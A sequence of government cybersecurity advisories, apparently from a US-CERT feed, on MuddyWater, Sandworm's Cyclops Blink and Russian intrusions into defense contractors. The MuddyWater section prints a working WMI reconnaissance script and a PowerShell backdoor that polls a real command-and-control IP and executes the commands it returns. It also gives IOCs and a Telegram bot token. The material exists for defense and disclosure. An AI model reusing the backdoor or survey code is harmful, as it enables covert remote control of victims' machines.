MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";$ips = "";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % {$ips = $ips + ", " + $_.IPAddress[0]};$S += $ips.substring(1);$S += ";;";$S += $O.OSArchitecture;$S += ";;";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += ";;";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += ";;";$S += $env:UserName;$S += ";;";$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S; Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;} MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title ID Use Reconnaissance Gather Victim Identity Information: Email Addresses T1589.002 MuddyWater has specifically targeted government agency employees with spearphishing emails. Resource Development Acquire Infrastructure: Web Services T1583.006 MuddyWater has used file sharing services including OneHub to distribute tools. Obtain Capabilities: Tool T1588.002 MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments. Initial Access Phishing: Spearphishing Attachment T1566.001 MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.  Phishing: Spearphishing Link T1566.002 MuddyWater has sent targeted spearphishing emails with malicious links. Execution Windows Management Instrumentation T1047 MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information. Command and Scripting Interpreter: PowerShell T1059.001 MuddyWater has used PowerShell for execution. Command and Scripting Interpreter: Windows Command Shell 1059.003 MuddyWater has used a custom tool for creating reverse shells. Command and Scripting Interpreter: Visual Basic T1059.005 MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros. Command and Scripting Interpreter: Python T1059.006 MuddyWater has used developed tools in Python including Out1.  Command and Scripting Interpreter: JavaScript T1059.007 MuddyWater has used JavaScript files to execute its POWERSTATS payload. Exploitation for Client Execution T1203 MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. User Execution: Malicious Link T1204.001 MuddyWater has distributed URLs in phishing emails that link to lure documents. User Execution: Malicious File T1204.002 MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. Inter-Process Communication: Component Object Model T1559.001 MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. Inter-Process Communication: Dynamic Data Exchange T1559.002 MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange. Persistence Scheduled Task/Job: Scheduled Task T1053.005 MuddyWater has used scheduled tasks to establish persistence. Office Application Startup: Office Template Macros T1137.001 MuddyWater has used a Word Template, Normal.dotm, for persistence. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.  Privilege Escalation Abuse Elevation Control Mechanism: Bypass User Account Control  T1548.002 MuddyWater uses various techniques to bypass user account control. Credentials from Password Stores T1555 MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. Credentials from Web Browsers

T1555.003

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. Defense Evasion Obfuscated Files or Information T1027 MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. Steganography T1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg. Compile After Delivery T1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code. Masquerading: Match Legitimate Name or Location T1036.005 MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection. Deobfuscate/Decode Files or Information

T1140

MuddyWater decoded Base64-encoded PowerShell commands using a VBS file. Signed Binary Proxy Execution: CMSTP

T1218.003

MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload. Signed Binary Proxy Execution: Mshta T1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. Signed Binary Proxy Execution: Rundll32 T1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. Execution Guardrails T1480 The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line. Impair Defenses: Disable or Modify Tools T1562.001 MuddyWater can disable the system's local proxy settings. Credential Access OS Credential Dumping: LSASS Memory T1003.001 MuddyWater has performed credential dumping with Mimikatz and procdump64.exe. OS Credential Dumping: LSA Secrets

T1003.004

MuddyWater has performed credential dumping with LaZagne. OS Credential Dumping: Cached Domain Credentials T1003.005 MuddyWater has performed credential dumping with LaZagne. Unsecured Credentials: Credentials In Files

T1552.001

MuddyWater has run a tool that steals passwords saved in victim email. Discovery  System Network Configuration Discovery T1016 MuddyWater has used malware to collect the victim’s IP address and domain name. System Owner/User Discovery T1033 MuddyWater has used malware that can collect the victim’s username. System Network Connections Discovery T1049 MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. Process Discovery T1057 MuddyWater has used malware to obtain a list of running processes on the system. System Information Discovery

T1082

MuddyWater has used malware that can collect the victim’s OS version and machine name. File and Directory Discovery T1083 MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET." Account Discovery: Domain Account T1087.002 MuddyWater has used cmd.exe net user/domain to enumerate domain users. Software Discovery T1518 MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. Security Software Discovery T1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. Collection Screen Capture T1113 MuddyWater has used malware that can capture screenshots of the victim’s machine.

Archive Collected Data: Archive via Utility

T1560.001 MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded. Command and Control Application Layer Protocol: Web Protocols T1071.001 MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. Proxy: External Proxy T1090.002

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 

MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.

Web Service: Bidirectional Communication T1102.002 MuddyWater has used web services including OneHub to distribute remote access tools. Multi-Stage Channels T1104 MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. Ingress Tool Transfer T1105 MuddyWater has used malware that can upload additional files to the victim’s machine. Data Encoding: Standard Encoding T1132.001 MuddyWater has used tools to encode C2 communications including Base64 encoding. Data Encoding: Non-Standard Encoding T1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. Remote Access Software  T1219 MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. Exfiltration Exfiltration Over C2 Channel T1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.

 

MitigationsProtective Controls and Architecture
  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 
Identity and Access Management
  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 
Phishing Protection
  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 
Vulnerability and Configuration Management
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Prioritize patching known exploited vulnerabilities.
Additional Resources
  • For more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat Overview and Advisories and CNMF's press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

5.199.133[.]149
45.142.213[.]17    
45.142.212[.]61
45.153.231[.]104 
46.166.129[.]159 
80.85.158[.]49 
87.236.212[.]22
88.119.170[.]124 
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228 
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248 
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128

Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: Gram.app.exe Metadata

Filename gram_app.exe  Description NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key  Size 16999598 bytes  MD5 15fa3b32539d7453a9a85958b77d4c95  SHA-1 11d594f3b3cf8525682f6214acb7b7782056d282  SHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054  Compile Time 2021-09-25 21:57:46 UTC 

 

Table 3: Index.exe Metadata

Filename  index.exe  Description The final PyInstaller-bundled Python 3.9 backdoor  Size 17263089 bytes  MD5 5763530f25ed0ec08fb26a30c04009f1  SHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992  SHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2   Compile Time 2021-08-01 04:39:46 UTC    Functionality  Installation 

Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. 

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift. 

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt. 

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field  Value Description Chat ID 2090761833  This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.  Bot ID Random value between 10,000,000 and 90,000,000  This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware. Telegram Token  2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY  This is the initial token used to authenticate each message to the Telegram Bot API.   Tasking 

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command Description delete  This command causes the backdoor to exit; it does not remove persistence.  download url””filename  The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.   change token””newtoken  The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file.  disconnect  The original connection to Telegram is terminated. It is likely used after a change token command is issued. 

 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.

Defense Evasion  Anti-Sandbox 

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

Communications  Beacon Format 

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

  Traffic obfuscation 

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

 

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

  Detection 

Table 6 outlines indicators of compromise.
 

Table 6: Indicators of Compromise

Type Description Values Path Telegram Session Persistence File (Obfuscated)  %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt  Path Installation path of the Small Sieve binary  %AppData%\OutlookMicrosift\index.exe  Registry value name Persistence Registry Key pointing to index.exe with a “Platypus” argument HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift    String Recover Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at Cybersecurity_Requests@nsa.gov. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions
  • February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-054A: New Sandworm Malware Cyclops Blink Replaces VPNFilter

US-CERT Security Alerts - Wed, 02/23/2022 - 07:00
Original release date: February 23, 2022
Summary

The Sandworm actor, which the United Kingdom and the United States have previously attributed to the Russian GRU, has replaced the exposed VPNFilter malware with a new more advanced framework.

The United Kingdom's (UK) National Cyber Security Centre (NCSC), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) in the U.S. have identified that the actor known as Sandworm or Voodoo Bear is using a new malware, referred to here as Cyclops Blink. The NCSC, CISA, and the FBI have previously attributed the Sandworm actor to the Russian General Staff Main Intelligence Directorate’s Russian (GRU’s) Main Centre for Special Technologies (GTsST). The malicious cyber activity below has previously been attributed to Sandworm:

Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices.

This advisory summarizes the VPNFilter malware it replaces, and provides more detail on Cyclops Blink, as well as the associated tactics, techniques and procedures (TTPs) used by Sandworm. An NCSC malware analysis report on Cyclops Blink is also available.

It also provides mitigation measures to help organizations defend against malware.

Click here for a PDF version of this report.

Technical DetailsVPNFilter The malware was first exposed in 2018

A series of articles published by Cisco Talos in 2018 describes VPNFilter and its modules in detail. VPNFilter was deployed in stages, with most functionality in the third-stage modules. These modules enabled traffic manipulation, destruction of the infected host device, and likely enabled downstream devices to be exploited. They also allowed monitoring of Modbus SCADA protocols, which appears to be an ongoing requirement for Sandworm, as also seen in their previous attacks against ICS networks.

VPNFilter targeting was widespread and appeared indiscriminate, with some exceptions: Cisco Talos reported an increase of victims in Ukraine in May 2018. Sandworm also deployed VPNFilter against targets in the Republic of Korea before the 2018 Winter Olympics. 

In May 2018, Cisco Talos published the blog that exposed VPNFilter and the U.S. Department of Justice linked the activity to Sandworm and announced efforts to disrupt the botnet.

Activity since its exposure 

A Trendmicro blog in January 2021 detailed residual VPNFilter infections and provided data which showed that although there had been a reduction in requests to a known C2 domain, there was still more than a third of the original number of first-stage infections.

Sandworm has since shown limited interest in existing VPNFilter footholds, instead preferring to retool.

Cyclops Blink Active since 2019

The NCSC, CISA, the FBI, and NSA, along with industry partners, have now identified a large-scale modular malware framework (T1129) which is targeting network devices. The new malware is referred to here as Cyclops Blink and has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread.

The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

Note: Note that only WatchGuard devices that were reconfigured from the manufacturer default settings to open remote management interfaces to external access could be infected

Malware overview 

The malware itself is sophisticated and modular with basic core functionality to beacon (T1132.002) device information back to a server and enable files to be downloaded and executed. There is also functionality to add new modules while the malware is running, which allows Sandworm to implement additional capability as required.

The NCSC has published a malware analysis report on Cyclops Blink which provides more detail about the malware.

Post exploitation 

Post exploitation, Cyclops Blink is generally deployed as part of a firmware ‘update’ (T1542.001). This achieves persistence when the device is rebooted and makes remediation harder.

Victim devices are organized into clusters and each deployment of Cyclops Blink has a list of command and control (C2) IP addresses and ports that it uses (T1008). All the known C2 IP addresses to date have been used by compromised WatchGuard firewall devices. Communications between Cyclops Blink clients and servers are protected under Transport Layer Security (TLS) (T1071.001), using individually generated keys and certificates. Sandworm manages Cyclops Blink by connecting to the C2 layer through the Tor network.

Mitigations

Cyclops Blink persists on reboot and throughout the legitimate firmware update process. Affected organizations should therefore take steps to remove the malware. 

WatchGuard has worked closely with the FBI, CISA, NSA and the NCSC, and has provided tooling and guidance to enable detection and removal of Cyclops Blink on WatchGuard devices through a non-standard upgrade process. Device owners should follow each step in these instructions to ensure that devices are patched to the latest version and that any infection is removed.

The tooling and guidance from WatchGuard can be found at: https://detection.watchguard.com/.

In addition:

  • If your device is identified as infected with Cyclops Blink, you should assume that any passwords present on the device have been compromised and replace them (see NCSC password guidance for organizations.
  • You should ensure that the management interface of network devices is not exposed to the internet.
Indicators of Compromise

Please refer to the accompanying Cyclops Blink malware analysis report for indicators of compromise which may help detect this activity. 

MITRE ATT&CK®

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

Tactic

Technique

Procedure

Initial Access

T1133

External Remote Services

The actors most likely deploy modified device firmware images by exploiting an externally available service

Execution

T1059.004

Command and Scripting Interpreter: Unix Shell

Cyclops Blink executes downloaded files using the Linux API

Persistence

T1542.001

Pre-OS Boot: System Firmware

Cyclops Blink is deployed within a modified device firmware image

T1037.004

Boot or Logon Initialization Scripts: RC Scripts

Cyclops Blink is executed on device startup, using a modified RC script

Defense Evasion

 

T1562.004

Impair Defenses: Disable or Modify System Firewall

Cyclops Blink modifies the Linux system firewall to enable C2 communication

 

 

T1036.005

Masquerading: Match Legitimate Name or Location

Cyclops Blink masquerades as a Linux kernel thread process

Discovery

T1082

System Information Discovery

Cyclops Blink regularly queries device information

Command and Control

T1090

Proxy

T1132.002

Data Encoding: Non-Standard Encoding

Cyclops Blink command messages use a custom binary scheme to encode data

T1008

Fallback Channels

Cyclops Blink randomly selects a C2 server from contained lists of IPv4 addresses and port numbers

T1071.001

Application Layer Protocol: Web Protocols

Cyclops Blink can download files via HTTP or HTTPS

T1573.002

Encrypted Channel: Asymmetric Cryptography

Cyclops Blink C2 messages are individually encrypted using AES-256-CBC and sent underneath TLS

T1571

Non-Standard Port

The list of port numbers used by Cyclops Blink includes non-standard ports not typically associated with HTTP or HTTPS traffic

Exfiltration

T1041

Exfiltration Over C2 Channel

Cyclops Blink can upload files to a C2 server

A Cyclops Blink infection does not mean that an organization is the primary target, but it may be selected to be, or its machines could be used to conduct attacks.

Organizations are advised to follow the mitigation advice in this advisory to defend against this activity, and to refer to indicators of compromise (not exhaustive) in the Cyclops Blink malware analysis report to detect possible activity on networks. 

UK organizations affected by the activity outlined in should report any suspected compromises to the NCSC at https://report.ncsc.gov.uk/.

Further Guidance

A variety of mitigations will be of use in defending against the malware featured in this advisory:

About This Document

This advisory is the result of a collaborative effort by United Kingdom’s National Cyber Security Centre (NCSC), the United States’ National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA). 

CISA, FBI, and NSA agree with this attribution and the details provided in the report.

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. 

Disclaimers

This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.

Disclaimer of Endorsement: The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov.

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory:

U.S. organizations contact your local FBI field office at fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Australian organizations should report incidents to the Australian Signals Directorate’s (ASD’s) ACSC via cyber.gov.au or call 1300 292 371 (1300 CYBER 1).

U.K. organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hrs) or for urgent assistance, call 03000 200 973.

Revisions
  • February 23, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-047A: Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

US-CERT Security Alerts - Wed, 02/16/2022 - 07:00
Original release date: February 16, 2022
Summary

Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
• Enforce multifactor authentication.
• Enforce strong, unique passwords.
• Enable M365 Unified Audit Logs.
• Implement endpoint detection and response tools.

From at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:

  • Command, control, communications, and combat systems;
  • Intelligence, surveillance, reconnaissance, and targeting;
  • Weapons and missile development;
  • Vehicle and aircraft design; and
  • Software development, data analytics, computers, and logistics. 

Historically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. 

In many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.

These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.

For additional information on Russian state-sponsored cyber activity, see CISA's webpage, Russia Cyber Threat Overview and Advisories.

Click here for a PDF version of this report.

Threat Details Targeted Industries and Assessed Motive

Russian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.

During this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company’s products, relationships with other countries, and internal personnel and legal matters.

Through these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.

 

Figure 1. Targeted Industries

 

Figure 2. Exfiltrated Information

  Threat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access 

Russian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.

  • Threat actors use brute force techniques [T1110] to identify valid account credentials [T1589.001] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. Note: For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.
  • Threat actors send spearphishing emails with links to malicious domains [T1566.002] and use publicly available URL shortening services to mask the link [T1027]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim’s clicking on the link. 
